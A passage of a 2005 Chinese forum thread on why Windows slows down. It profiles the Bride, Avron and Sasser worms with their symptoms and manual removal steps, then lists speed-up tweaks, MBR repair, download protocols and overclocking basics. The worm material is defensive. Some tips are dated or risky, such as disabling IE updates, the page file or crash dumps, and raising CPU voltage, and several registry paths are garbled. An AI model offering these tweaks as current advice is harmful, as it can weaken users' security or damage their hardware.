    为了消除或减少 Windows 必须重新建立的网络连接数目，建议将一些不需要使用的网络驱动器断开，也就是进入“我的电脑”，右击已经建立映射的网络驱动器，选择“断开”即可。
10、缺少足够的内存
    Windows操作系统所带来的优点之一就是多线性、多任务，系统可以利用CPU来进行分时操作，以便你同时做许多事情。但事情有利自然有弊，多任务操作也会对你的机器提出更高的要求。朋友们都知道即使是一个最常用的WORD软件也要求最好有16MB左右的内存，而运行如3D MAX等大型软件时，64MB的内存也不够用。所以此时系统就会自动采用硬盘空间来虚拟主内存，用于运行程序和储存交换文件以及各种临时文件。由于硬盘是机械结构，而内存是电子结构，它们两者之间的速度相差好几个数量级，因而使用硬盘来虚拟主内存将导致程序运行的速度大幅度降低。
11、硬盘空间不足
    使用Windows系统平台的缺点之一就是对文件的管理不清楚，你有时根本就不知道这个文件对系统是否有用，因而Windows目录下的文件数目越来越多，容量也越来越庞大，加之现在的软件都喜欢越做越大，再加上一些系统产生的临时文件、交换文件，所有这些都会使得硬盘可用空间变小。当硬盘的可用空间小到一定程度时，就会造成系统的交换文件、临时文件缺乏可用空间，降低了系统的运行效率。更为重要的是由于我们平时频繁在硬盘上储存、删除各种软件，使得硬盘的可用空间变得支离破碎，因此系统在存储文件时常常没有按连续的顺序存放，这将导致系统存储和读取文件时频繁移动磁头，极大地降低了系统的运行速度。
12、硬盘分区太多也有错
    如果你的Windows 2000没有升级到SP3或SP4，并且定义了太多的分区，那么也会使启动变得很漫长，甚至挂起。所以建议升级最新的SP4，同时最好不要为硬盘分太多的区。因为Windows 在启动时必须装载每个分区，随着分区数量的增多，完成此操作的时间总量也会不断增长。[DISABLELBCODE]
--------------------------------------------------------------------------------
作者: saii　　时间: 2005-1-25 04:30　　 标题: Windows变慢原因分析及解决方法

[这个贴子最后由saii在 2005/01/24 05:14pm 第 1 次编辑]

三、病毒篇
    如果你的计算机感染了病毒，那么系统的运行速度会大幅度变慢。病毒入侵后，首先占领内存这个据点，然后便以此为根据地在内存中开始漫无休止地复制自己，随着它越来越庞大，很快就占用了系统大量的内存，导致正常程序运行时因缺少主内存而变慢，甚至不能启动；同时病毒程序会迫使CPU转而执行无用的垃圾程序，使得系统始终处于忙碌状态，从而影响了正常程序的运行，导致计算机速度变慢。下面我们就介绍几种能使系统变慢的病毒。
1、使系统变慢的bride病毒
  病毒类型：黑客程序
  发作时间：随机
  传播方式：网络
  感染对象：网络
  警惕程度：★★★★
  病毒介绍：
    此病毒可以在Windows 2000、Windows XP等操作系统环境下正常运行。运行时会自动连接www.hotmail.com网站，如果无法连接到此网站，则病毒会休眠几分钟，然后修改注册表将自己加入注册表自启动项，病毒会释放出四个病毒体和一个有漏洞的病毒邮件并通过邮件系统向外乱发邮件，病毒还会释放出FUNLOVE病毒感染局域网计算机，最后病毒还会杀掉已知的几十家反病毒软件，使这些反病毒软件失效。
    病毒特征
    如果用户发现计算机中有这些特征，则很有可能中了此病毒。
    .病毒运行后会自动连接www.hotmail.com网站。
    .病毒会释放出Bride.exe，Msconfig.exe，Regedit.exe三个文件到系统目录；释放出：Help.eml， Explorer.exe文件到桌面。
    .病毒会在注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项中加入病毒Regedit.exe的路径。
    .病毒运行时会释放出一个FUNLOVE病毒并将之执行，而FUNLOVE病毒会在计算机中大量繁殖，造成系统变慢，网络阻塞。
    .病毒会寻找计算机中的邮件地址，然后按照地址向外大量发送标题为：<被感染的计算机机名>（例：如果用户的计算机名为：张冬， 则病毒邮件的标题为：张冬）的病毒邮件。
    .病毒还会杀掉几十家国外著名的反病毒软件。
    用户如果在自己的计算机中发现以上全部或部分现象，则很有可能中了Bride(Worm.bride)病毒，请用户立刻用手中的杀毒软件进行清除。
    2、使系统变慢的阿芙伦病毒
    病毒类型：蠕虫病毒
    发作时间：随机
    传播方式：网络/文件
    感染对象：网络
    警惕程度：★★★★
    病毒介绍：
    此病毒可以在Windows 9X、Windows NT、Windows 2000、Windows XP等操作系统环境下正常运行。病毒运行时将自己复到到TEMP、SYSTEM、RECYCLED目录下，并随机生成文件名。该病毒运行后，会使消耗大量的系统资源，使系统明显变慢，并且杀掉一些正在运行的反病毒软件，建立四个线程在局域网中疯狂传播。
    病毒特征
    如果用户发现计算机中有这些特征，则很有可能中了此病毒：
    .病毒运行时会将自己复到到TEMP、SYSTEM、RECYCLED目录下，文件名随机
    .病毒运行时会使系统明显变慢
    .病毒会杀掉一些正在运行的反病毒软件
    .病毒会修改注册表的自启动项进行自启动
    .病毒会建立四个线程在局域网中传播
    用户如果在自己的计算机中发现以上全部或部分现象，则很有可能中了“阿芙伦（Worm.Avron）”病毒，由于此病毒没有固定的病毒文件名，所以，最好还是选用杀毒软件进行清除。
    3、恶性蠕虫震荡波
    病毒名称: Worm.Sasser
    中文名称: 震荡波
    病毒别名: W32/Sasser.worm [Mcafee]
    病毒类型: 蠕虫
    受影响系统:WinNT/Win2000/WinXP/Win2003
    病毒感染症状:
    .莫名其妙地死机或重新启动计算机；
    .系统速度极慢，cpu占用100%；
    .网络变慢；
    .最重要的是，任务管理器里有一个叫"avserve.exe"的进程在运行！
    破坏方式：
    .利用WINDOWS平台的 Lsass 漏洞进行广泛传播，开启上百个线程不停攻击其它网上其它系统，堵塞网络。病毒的攻击行为可让系统不停的倒计时重启。
    .和最近出现的大部分蠕虫病毒不同，该病毒并不通过邮件传播，而是通过命令易受感染的机器
下载特定文件并运行，来达到感染的目的。
    .文件名为：avserve.exe
    解决方案:
    .请到以下网址下载补丁升级您的操作系统，免受攻击
    .请打开个人防火墙屏蔽端口：445、5554和9996，防止名为avserve.exe的程序访问网络
    .手工解决方案：
    首先，若系统为WinMe/WinXP，则请先关闭系统还原功能；
    步骤一，使用进程程序管理器结束病毒进程
    右键单击任务栏，弹出菜单，选择“任务管理器”，调出“Windows任务管理器”窗口。在任务管理器中，单击“进程”标签，在例表栏内找到病毒进程“avserve.exe”，单击“结束进程按钮”，点击“是”，结束病毒进程，然后关闭“Windows任务管理器”；
    步骤二，查找并删除病毒程序
    通过“我的电脑”或“资源管理器”进入系统安装目录（Winnt或windows)，找到文件“avser ve.exe”，将它删除;然后进入系统目录(Winnt\system32或windows\system32)，找　　到文件"*_up.exe"， 将它们删除；
    步骤三，清除病毒在注册表里添加的项
    打开注册表编辑器: 点击开始——>运行， 输入REGEDIT， 按Enter；
    在左边的面板中， 双击（按箭头顺序查找，找到后双击）：
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    在右边的面板中， 找到并删除如下项目："avserve.exe" = %SystemRoot%\avserve.exe
    关闭注册表编辑器。
--------------------------------------------------------------------------------
作者: saii　　时间: 2005-1-25 04:32　　 标题: Windows变慢原因分析及解决方法

[这个贴子最后由saii在 2005/01/24 05:14pm 第 2 次编辑]

第二部份 系统加速
    一、Windows 98
    1、不要加载太多随机启动程序
    不要在开机时载入太多不必要的随机启动程序。选择“开始→程序→附件→系统工具→系统信息→系统信息对话框”，然后，选择“工具→系统配置实用程序→启动”，只需要internat.exe前打上钩，其他项都可以不需要，选中后确定重起即可。
    2、转换系统文件格式
    将硬盘由FAT16转为FAT32。
    3、不要轻易使用背景
    不要使用ActiveDesktop，否则系统运行速度会因此减慢(右击屏幕→寻显示器属性→Web标签→将其中关于“活动桌面”和“频道”的选项全部取消)。
    4、设置虚拟内存
    自己设定虚拟内存为机器内存的3倍，例如：有32M的内存就设虚拟内存为96M，且最大值和最小值都一样(此设定可通过“控制面板→系统→性能→虚拟内存”来设置)。
    5、一些优化设置
    a、到控制面板中，选择“系统→性能→文件系统”。将硬盘标签的“计算机主要用途”改为网络服务器，“预读式优化"调到全速。
    b、将“软盘”标签中“每次启动就搜寻新的软驱”取消。
    c、CD-ROM中的“追加高速缓存”调至最大，访问方式选四倍速或更快的CD-ROM。
    6、定期对系统进行整理
    定期使用下列工具：磁盘扫描、磁盘清理、碎片整理、系统文件检查器(ASD)、Dr?Watson等。
    二、Windows 2000
   1、升级文件系统
   a、如果你所用的操作系统是win 9x与win 2000双重启动的话，建议文件系统格式都用FAT32格式，这样一来可以节省硬盘空间，二来也可以9x与2000之间能实行资源共享。
    提醒：要实现这样的双重启动，最好是先在纯DOS环境下安装完9x在C区，再在9x中或者用win 2000启动盘启动在DOS环境下安装2000在另一个区内，并且此区起码要有800M的空间以上
    b、如果阁下只使用win 2000的话，建议将文件系统格式转化为NTFS格式，这样一来可节省硬盘空间，二来稳定性和运转速度更高，并且此文件系统格式有很好的纠错性；但这样一来，DOS和win 9x系统就不能在这文件系统格式中运行，这也是上面所说做双启动最好要用FAT32格式才能保证资源共享的原因。而且，某些应用程序也不能在此文件系统格式中运行，大多是DOS下的游戏类。
    提醒：在win 2000下将文件系统升级为NTFS格式的方法是，点击“开始-程序-附件”选中“命令提示符”，然后在打开的提示符窗口输入"convert drive_letter:/fs:ntfs"，其中的"drive"是你所要升级的硬盘分区符号，如C区；还需要说明的是，升级文件系统，不会破坏所升级硬盘分区里的文件，无需要备份。
    2、清除不需要的文件和程序：
    a、删除Windows强加的附件：
    . 用记事本NOTEPAD修改\winnt\inf\sysoc.inf，用查找/替换功能，在查找框中输入，hide（一个英文逗号紧跟hide），将“替换为”框设为空。并选全部替换，这样，就把所有的，hide都去掉了，
    . 存盘退出，
    . 再运行“添加-删除程序”，就会看见多出了个“添加/删除 Windows 组件”的选项；
    b、打开“文件夹选项”，在“查看”标签里选中“显示所有文件和文件夹”，此时在你安装win 2000下的区盘根目录下会出现Autoexec.bat和Config.sys两个文件，事实上这两个文件里面根本没有任何内容，可以将它们安全删除。
    c、右击“我的电脑”，选中“管理”，在点“服务和应用程序”下的“服务”选项，会看见win 2000上加载的各个程序组见，其中有许多是关于局域网设置或其它一些功能的，你完全可以将你不使用的程序禁用；
    如：Alertr，如果你不是处于局域网中，完全可以它设置为禁用；还有Fax Service，不发传真的设置成禁用；Print Spooler，没有打印机的设置成制用；Uninterruptible power Supply，没有UPS的也设置成禁用，这些加载程序你自己可以根据自己实际情况进行设置。
    各个加载程序后面都有说明，以及运行状态；选中了要禁用的程序，右击它，选“属性”，然后单击停止，并将“启动类型”设置为“手动”或者“已禁用”就行了
    d、关掉调试器Dr. Watson；
    运行drwtsn32，把除了“转储全部线程上下文”之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十兆的空间。这是出错程序的现场，对我们没用。另外蓝屏时出现的memory.dmp也可删掉。可在我的电脑/属性中关掉BSOD时的DUMP。
    3、去掉文鼎字体
    Win 2000似乎与文鼎字体并不怎么兼容，如果你在运行2000时总是安装不了新的软件，或者运行些程序总是出错，请把文鼎字体删除；
    4、优化硬盘参数
    a、右击“我的电脑”，选“属性”，选中“硬件”下的“设备管理器”标签，然后在“磁盘驱动器”中找到你的硬盘，查看它的属性，在“磁盘属性”标签中选中“启用了写入缓存”；
    b、在“IDE控制器”中分别查看“Primary IDE Channel”和“Secondary IDE Channel”的属性，在“高级设置”中将“设备类型”设定为“自动检测”，“传输模式”设定为“DMA（若可用）”；
    5、优化系统属性
    a、右击“我的电脑”，选“属性”，在“高级”的“性能选项”标签下，选中“应用程序响应”下的“应用程序”；这样系统会分配给前台程序更多的资源，使之运行速度更快；
    b、选中仍然在此标签下“虚拟内存”下的“更改”选项，将虚拟内存的值定为你物理内存的2.5倍，且最大值和最小值一样；例如你的物理内存为32M，那虚拟内存值就是80，64M内存则为160；并且尽量避免将虚拟内存设置在与系统文件同一个分区上，如果win 2000安装在C区，就将虚拟内存设置在D区或者E区；
    6、优化启动设置
    a、右击“我的电脑”，选“属性”，选中“高级”下的“启动和故障修复”标签，如果你只安装了win 2000一套操作系统的话，就去掉“显示操作系统列表”复选框；然后去掉“将事件写入系统日志”、“发送管理警报”和“自动重新启动”的选项；并将“写入调试信息”设置为“无”；
    b、将C区根目录下的boot.ini文件的系统、隐含及只读属性去除，用记事本打开，将
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect
    最后的fastdetect改为nodetect
    c、在“开始-运行”中输入regedit，打开“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control”，将右边窗口的SystemStartOptions键值 改为NODETECT
    三、Windows XP
    在使用Windows XP的过程中，系统速度会随着时间的推移越来越慢，你可重装系统，但重装后，那么多的应用软件也要重新安装，如何在不安装系统的前提下提升Windows XP的运行速度呢？
    1、定期整理磁盘碎片
    计算机硬盘中最细小的单位是扇区，一个档案通常会占用若干扇区，每当硬盘用久了，无数次的新增、更改和删除档案后，就会造成很多断断续续的扇区，因而非连续性的档案便会愈来愈多，硬盘磁头便需要花更多时间跳来跳去来读取数据，这就导致硬盘速度减慢。有见及此，windows才会有“整理磁盘碎片”出现。只要执行“整理磁盘碎片”，所有非连续性的档案都会被重新编排得整整齐齐，至于执行时间，大约一星期左右执行一次便可了。
    2、去掉预定任务
    通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始
    a、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger。启用注册表管理器：开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run\
MSMSGS”/BACKGROUND这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。
    b、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINESYSTEM\ Current\Control\SetControl\ Session anagerMemory\ManagementPrefetchParameters，有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。
    3、关闭系统属性中的特效
    这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。
    4、快速浏览局域网络的共享
    通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current
    \Version\Explorer\Remote\Computer\Name\Space。在此键值下，会有个D6277990-4C6A-11CF-8D87-00AA0060F5BF{}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，速度会明显的提高！
    5、Windows XP实现1秒关机
    体积庞大的Windows XP操作系统关机起来很慢，大约需要30～50秒，但是按我们下面提供的方法更改注册表选项，你的Windows XP系统关机速度就会非常的快了。
    找到HKEY－CURRENT－USER\Control Panel\Desktop键，将WaitToKillAppTimeout改为：1000，即关闭程序时仅等待1秒。
另：程序出错和系统自动关闭停止响应的程序如何实现快速关闭。
    a、将HungAppTimeout　值改为：200，表示程序出错时等待0.5秒。
    b、将AutoEndTasks 值设为：1，让系统自动关闭停止响应的程序。
   6、关掉调试器Dr. Watson
    我好像从win95年代开始一次也没用过这东西，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current\Version\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。
    7、加快启动速度
    要加快Windows XP的启动速度。可以通过修改注册表来达到目的，在注册表编辑器，找到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少；
    8、加快开关机速度
    在Windows XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。加快开机速度，可以先设置自动结束任务，首先找到HKEY_CURRENT_USERControl PanelDesktop，把AutoEndTasks的键值设置为1；然后在该分支下有个“HungAppTimeout”，把它的值改为“4000(或更少)，默认为50000；最后再找到HKEY_LOCAL_MACHINESystemCurrentControlSetControl，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置关机速度明显快了不少。
    9、优化网上邻居
    Windows XP网上邻居在使用时系统会搜索自己的共享目录和可作为网络共享的打印机以及计划任务中和网络相关的计划任务，然后才显示出来，这样速度显然会慢的很多。这些功能对我们没多大用的话，可以将其删除。在注册表编辑器中找到HKEY_LOCAL_MACHINEsofewareMicrosoftWindowsCurrent VersionExploreRemoteComputerNameSpace，删除其下的(打印机)和{D6277990-4C6A-11CF8D87- 00AA0060F5BF}(计划任务)，重新启动电脑，再次访问网上邻居，你会发现快了很多。
    10、自动关闭停止响应程序
    有些时候，Win XP会提示你某某程序停止响应，很烦，通过修改注册表我们可以让其自行关闭，在HKEY_CURRENT_USERControl PanelDesktop中将字符健值是AutoEndTasks的数值数据更改为1，重新注销或启动即可。
    11、加快菜单显示速度
    为了加快菜单的显示速度，我们可以按照以下方法进行设置：我们可以在HKEY_CURRENT_USERControl PanelDesktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以达到加快菜单显示速度的效果。
    12、清除内存中不被使用的DLL文件
    在注册表的HKKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion，在Explorer增加一个项AlwaysUnloadDLL，默认值设为1。注：如由默认值设定为0则代表停用此功能。
    13、加快预读能力改善开机速度
    Windows XP预读设定可提高系统速度，加快开机速度。按照下面的方法进行修改可进一步善用CPU的效率：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessionManager
MemoryManagement]，在PrefetchParameters右边窗口，将EnablePrefetcher的数值数据如下更改，如使用PIII 800MHz CPU以上的建议将数值数据更改为4或5，否则建议保留数值数据为默认值即3。
四、Windows 2003
    现在最新的微软操作系统是Win Server 2003。它是对应服务器的，现在有越来越多有朋友都升级到Windows 2003，安装之后大家发现没有，些操作系统麻烦多多，这样功能没有，那样功能打不开，甚至连听歌，玩游戏也成问题了。其实，Server 2003在XP的基础强化了安全性和稳定性，不得不关闭了一些工作站系统。我们是把Win 2003当工作站用，当然要重新打开这些服务。
    1、为DirectX加速
    刚刚安装了Windows 2003，但是现在发现很多3D游戏都不能运行，只有一些传统2D平面游戏还能勉强运行，而且速度很慢。感觉上Windows 2003在运行PhotoShop时很快，但是为何不能运行3D游戏？
    这并不是因为Windows 2003不支持3D游戏，而是系统设置的问题。首先请确保以正确的方式安装好显卡驱动，然后就要打开DirectX加速。DirectX加速是3D游戏最基本的需要，然而“为了”使Windows Server 2003更为单一地面向服务器平台应用，微软居然默认将其加速功能关闭。即便是在安装了最新的DirectX 9.0之后也不会自动打开加速功能，而必须手动设置。在“开始”→“运行”对话框中输入“dxdiag”以打开DirectX诊断工具。随后在显示一栏中将DirectDraw、Direct3D、AGP纹理加速功能启用。如此一来，Windows Server 2003便能运行各种3D游戏。除此以外，Windows Server 2003还默认关闭了硬件加速，你可以在显示属性的高级菜单中将其设置为完全加速。
    2、关闭服务器向导
    装完win 2003，你会发现“管理您的服务器”出现，把左下角的“登录时不要显示该页”勾上。如果你在开机时找不到，可以进入控制面板－管理工具－管理你的服务器中找到
    3、开启硬件加速
    桌面点击右键，进入属性－设置－高级－疑难解答，开启完全的硬件加速，这时会出现黑屏，然后回复正常。
    4、声音加速
    开始－运行－输入dxdiag－声音，把“声音的硬件加速级别”拉到“完全加速”。
    5、提高开/关机速度
    如果你的内存有768MB或以上，可以禁用虚拟内存，XP内核的内存管理已经相当优秀，而且虚拟内存（pagefile.sys）和休眠模式（Hiberfil.sys）采用不同的文件，可以避免Win9x系统禁用虚拟内存出现的无法正常待机和休眠。在我们的测试系统上，开机一整天，关机仅仅用了9秒钟。
    右键点击“我的电脑”图标，进入属性－高级－性能－设置－高级－虚拟内存－更改，勾上无分页文件，然后按设置并确定。
    无论在什么时候，增加内存都是提高相对速度的最快方法，因此，如果不是经常进行高级计算、图像处理、DX9 3d/33.shtml‘ target=‘_blank‘ class=‘article‘>3D游戏的朋友，升级时尽可能先考虑内存容量。
    6、提高系统性能
    右键点击“我的电脑”图标，进入属性－高级－性能－设置，调整为最佳性能。
    7、加速任务栏
    除了将“任务栏保持在其它窗口的前端”其它全部去掉，原因如下：
    自动隐藏任务栏：避免找不到任务栏，而且占用系统分组相似
    任务栏按钮：程序过于集中，很难找到
    显示时钟：有钟就无须用时钟
    隐藏不活动图标：不知道现在使用了那些应用程序
    8、提高桌面显示速度
    右键点击桌面进入显示属性，把桌面墙纸和屏幕保护都关掉，在外观－效果中，把所有勾去掉。
    9、资源管理器提速
    在资源管理器或我的电脑上，选择工具－文件夹选项－常规，选择“使用windows传统风格的文件夹”。
    把“隐藏受保护的操作系统文件”和“隐藏己知文件类型的扩展名”之外所有的选项都去掉。特别是“记住每个文件夹的视图设置”、“鼠标指向文件夹和桌面项时显示提示信息”、“在文件夹提示中显示文件大小信息”这几项关掉，去掉个性化设置。
    第三是资源管理器的优化，查看中使用“列表”形式，以最小的图标和信息显示内容。在工具栏菜单中，把标准按钮和链接都去掉，这些功能全部通过快捷键可以实现，多留无益。
    10、关掉系统桌面图标
    在桌面上按右键，选择排列图标，去掉显示桌面图标的勾，关掉所有图标，节省大量资源。
    11、IE的优化
    IE的界面优化基本和资源管理器相同，都是尽可能减少功能条，只留下地址栏。不过，在工具－Internet选项中就有许多好玩东西了。
    常规－可以更改的主页用空白页，开启时无须载入任何网页，速度快
    高级－多媒体，去掉“启用自动图像大小调整”，直接显示整幅图像，减少IE的工作量。
    浏览，去掉“启用脱机项目按计划同步”，在宽带包月如此流行的今天，脱机还有什么用？
    去掉“使用平滑滚动”，让左边的导航条，按照正常的page up/down方式快速翻页。
    去掉“下载完成后发出通知”，download完就算还通知什么，多此一举。
    去掉“在地址栏中显示转到按钮”，转到的网址我们都没多大用处。
    去掉“自动检查Internet Explorer更新”，手动更新永远比自动更新要快，而且无须让IE经常留意是否需要更新。
    12、使用耗电模式
    为了让电脑经常处于最佳状态，把所有的省电模式关掉，在控制面板－电源使用方案中选择“演示”方案，从不关闭监视器、硬盘或进行系统待机。
    13、键盘提速
    在控制面板－键盘中，把“重复延迟”和“重复速度”都拉到右边，文字编辑的时候立即见功。
    14、优化系统启动项
    有部分应用程序在启动时没有通过启动菜单载入，而是直接通过注册表运行，对于这部分程序，我们可以在开始－运行，输入msconfig，在启动中找出没有用的选项。如：
    realsched：real播放器的升级选项
    elbycheck：CloneCD的实时监控
    qqtask：Quicktime播放器的任务栏
    neroCheck：nero刻录软件的检查
    Adobe Gamma Loader：Adobe软件（photoshop之流）的伽玛纠正。

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


不用专门软件照样修复硬盘分区表

《一键清理系统垃圾》

不用专门软件照样修复硬盘分区表

    硬盘分区表一旦被破坏，系统就无法启动。这种情况下该怎么办呢？看到有些媒体推荐用Disk Genius。
可是并不是每个朋友手里都有这个软件。当电脑出现问题时，电脑已经不能启动了，更别提上网去下载这个
软件了！其实有更简单的办法，那就是用Windows的安装光盘来修复。
    第一种方法，只有Windows 98光盘时。首先用光盘或者软盘引导系统，然后用Fdisk/ mbr修复分区表，
不过这样未必能够完全修复。但一般情况下，至少可以用上C盘了，然后再下载Disk Genius修复也是可行之道。

    第二种方法：有Windows XP光盘的，用Windows XP光盘启动后，选择第二项“要用恢复控制台修复Windows
XP安装，请按R键”。按下R键，就可以进入Windows XP的故障控制台了。然后键入Fixmbr，回车，就可以恢复
大多数情况下的分区表错误了。经我实际使用发现用fixmbr命令不仅可以修复Windows XP系统下的分区错误，
对Windows 98系统，以及Windows 98/XP双系统均有效，fixmbr命令格式如下：
fixmbr [device_name(驱动器盘符)]。


常见网络下载方式简要介绍

《一键清理系统垃圾》

常见网络下载方式简要介绍

   HTTP方式：HTTP是我们最常见的网络下载方式之一。对于这种方式，我们一般可以通过IE浏览器或网际快车(FlashGet)、网络蚂蚁(NetAnts)等软件来下载。
   FTP方式：FTP(File transfer protocol)也是一种很常用的网络下载方式。它的标准地址形式就像“ftp://218.79.9.100/down/freezip23.zip”。FTP方式具有限制下载人数、屏蔽指定IP地址、控制用户下载速度等优点，所以，FTP更显示出易控性和操作灵活性，比较适合于大文件的传输(如影片、音乐等)。
   RTSP和MMS方式：它们分别是由Real Networks和微软所开发的两种不同的流媒体传输协议。对于采用这两种方式的影视或音乐资源，原则上只能用Real player或Media player在线收看或收听。但是为了能够更流畅地欣赏流媒体，网上的各种流媒体下载工具也应运而生，像StreamBox VCR和NetTransport(影音传送带)就是两款比较常用的流媒体下载工具。
   ED2K方式：这是一种P2P软件的专门下载方式，地址的标准形式如“ed2k://|file|abc.avi|695476224|7792363B4AC1F3763999E930BBF3D1|”，地址一般是由文件名、文件大小和文件ID号码三个部分组成，这种地址一定要通过Emule或Edonkey等P2P软件才能进行下载。


超频基础

《一键清理系统垃圾》

超频基础

一、超频基础

超频，顾名思义就是把计算机设备运行在比设备标称更高的频率上。例如让一颗标称在500MHz的CPU
运行在600MHz甚至更高的频率上。当然，超频的最大意义还在于我们能稳定地使用，否则超频就变得毫
无意义。

为了成功地实现超频，我们必须对超频具有一定的认识，现代CPU的主频为外频(FSB)×倍频(RATIO)，
所以我们超频的时候可以选择超倍频以及外频。然而新出的CPU几乎都是锁定了倍频的，于是我们超频的
选择就只有外频了。最为典型的例子就是极品赛扬处理器的CPU外频为66MHz，然而我们可以让外频运行在
100MHz甚至更高的频率上，从而大幅度提升CPU主频，达到超频的目的。

影响超频成功的因素：

1.来自CPU内部的因素

我们知道，相同核心不同频率的CPU在生产线上生产的时候，并没有严格区分频率，CPU在生产出来
之后，要通过一定的检测手段，以确定它最大可达到的频率。因此低频CPU和高频CPU的本质相差极少。
有的时候出于某种原因，厂商会把高频CPU标识为低频CPU销售。例如编号为SL2W8的PⅡ300MHz大多数都
是PⅡ450标志为PⅡ300出售的，所以大多数SL2W8的PⅡ300MHz都能超频到450MHz甚至更高。

那么核心电压对于超频又有什么影响呢？当CPU运行在比较高的频率的时候，核心电压不足会导致内
部的电平信号会不清晰，CPU不能稳定运行。适当增加核心电压，有助于保证CPU内部电平信号的稳定与
清晰，从而增加了CPU的稳定性。这就是为什么我们在超频的时候为了达到CPU超频极限需要逐步增加CPU
核心电压的原因了。但在增加电压的同时，CPU的发热量也会增加，而这个热量对CPU的正常工作和寿命
是不利的，所以找到合适的电压超频可需要花不少的工夫。

当然，CPU厂商在提高了CPU的频率或者改进CPU的制造工艺时，也会使用适当提高电压的办法来增
加稳定性，所以市面上的CCO核心的1.7V赛扬Ⅱ超频性能普遍优于CBO核心的1.65V赛扬，不过这是厂商经
过大量测试得出的安全值，尽管放心使用。

2.来自CPU外部的因素

主板芯片组在设计的时候，AGP和PCI总线的频率和外频是有一定比率的，我们在超频的时候对于主
板芯片组各总线的比率应该有一定的认识。早期BX主板在外频为66MHz-100MHz的时候，AGP总线的频率
为1×FSB，PCI总线的频率为1/2×FSB，在100MHz以上的时候，AGP=2/3×FSB，PCI=1/3×FSB。从这个
比率看，我们就可以很容易的得出：当FSB为66MHz时，AGP显卡运行在标准的66MHz，PCI设备和IDE设备
也运行在标准的33MHz上，当FSB为75MHz时，AGP显卡运行在非标准的75MHz，PCI设备和IDE设备也运行
在非标准的37.5MHz。如果我们的AGP显卡和硬盘承受能力比较强的话，我们的系统就能稳定的运行在
75MHz。到83MHz对显卡以及硬盘的要求就更高，要求IDE设备能够在41.5MHz下稳定运行。于是，一些
主板厂商为了让主板在133MHz外频下，IDE和PCI设备能够稳定的运行，加入了PCI四分频，让PCI和IDE
设备运行在标准频率上。

说到BX我们就不能不说到在133MHz外频下，AGP显卡已经运行在89MHz，许多显卡已经不能承受，于
是AGP显卡就成了BX主板在133MHz外频下超频成功的瓶颈。在这之后推出的VIA 694X、Intel 815系列正
式支持PC133规格的芯片组就解决了这个问题。这里特别要说明的就是当系统外频运行在非标准外频下
对系统硬件比如CPU、显卡具有很大的损害，所以推荐使用66MHz、100MHz、133MHz等标准外频来超频，
这样超频成功的系统更为稳定可靠。

3.发热因素的影响

发热可以说是CPU超频的杀手，一般来说CPU核心的耐热温度不超过80℃度。超过这个温度就有可能
导致CPU运行不稳定，甚至烧毁。当我们超频的时候，CPU由于超过了标称的频率，CPU功耗增加的同时，
CPU温度也随之升高，一般来说，我们通过一些手段来检测到的CPU温度都是CPU的表面温度，这个温度
以不超过50摄氏度为宜。过高的温度会缩短CPU的使用寿命甚至永久的损坏CPU。所以我们在超频的时
候需要采用散热措施来保证CPU的安全。

二、怎样超频

上面我们讲述了超频的基础知识，我们接下来看看怎么样超频。超频CPU可以分为两种：硬件超频
和软超频，其实两种超频方式的本质都是一样的，都是通过调节主板上的时钟控制来达到超频的目的。
简单说，我们超频的时候就是通过主板上的跳线或者DIP开关调节CPU的频率(硬超频)或者使用相关的
超频软件来调节主板上的PLL芯片达到超频的目的，但是超频成功还需要许多小技巧。

1.逐级增加CPU频率

虽然逐级增加频率看起来很简单，但是有助于我们达到CPU超频极限，从而发挥我们CPU最大的潜
能。有些主板甚至提供了线性超频的功能，可以逐MHz来提高外频，接近或者达到超频极限。

2.适当提高核心电压

前面我们已经讲过为了保证最大限度的超频或者保证超频的稳定性需要适当增加CPU核心电压，但
是增加核心电压具有一定的风险，增大核心电压之后会导致CPU温度的升高，过多的增加核心电压会导
致CPU电路的永久损坏。一般来说我们超频时，增加的核心电压不要超过CPU标称电压的10%。并且注意
